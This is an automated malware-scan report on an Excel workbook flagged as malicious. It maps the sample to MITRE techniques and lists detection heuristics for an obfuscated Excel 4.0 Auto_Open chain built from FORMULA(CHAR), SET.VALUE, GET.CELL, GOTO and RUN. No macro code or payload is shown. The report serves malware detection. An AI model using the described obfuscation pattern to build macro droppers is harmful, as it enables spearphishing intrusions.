MALICIOUS
Risk Score: 140
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The file contains Excel 4.0 macros, specifically an obfuscated Auto_Open execution chain. The `RUN(EC24422)` command within the macro suggests it is designed to execute arbitrary code, likely downloading and running a second-stage payload. The presence of an Auto_Open macro indicates it was likely delivered as a spearphishing attachment.
Heuristics (3)
- Excel 4.0 Auto_Open defined name (critical, `OLE_XLM_AUTOOPEN_DEFINEDNAME`): oletools recovered an Auto_Open / Auto_Close entry from an Excel 4.0 macro sheet. The raw BIFF name can be tokenized or partially opaque to byte-string checks, but the recovered macro listing confirms the workbook has an XLM auto-execution entry.
- Obfuscated XLM Auto_Open execution chain (critical, `OLE_XLM_OBFUSCATED_AUTOEXEC_CHAIN`): Excel 4.0 macro sheet contains an Auto_Open / Auto_Close entry and an obfuscated formula execution chain. The macro builds strings through FORMULA(CHAR(...)), primes state with SET.VALUE / GET.CELL / GOTO, and transfers control through RUN(). This is a high-confidence XLM malware pattern.
- Excel 4.0 (XLM) macro sheet present (medium, `OLE_XLM_AUTOOPEN`): Workbook contains an Excel 4.0 macro sheet sub-stream; XLM is rarely seen in modern legitimate workbooks and was a major Office malware vector during 2020-2022.
Extracted artifacts (1)
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| xlm_macros.txt | xlm-macro | oletools.olevba.extract_all_macros (XLM macro listing) | 127549 bytes |

SHA-256: e2e0e2d9400a3b7c3f2f4f7f99f73232325b94ccfcfff8f049f74d461096af6c
Preview script: first 1,000 lines of the extracted script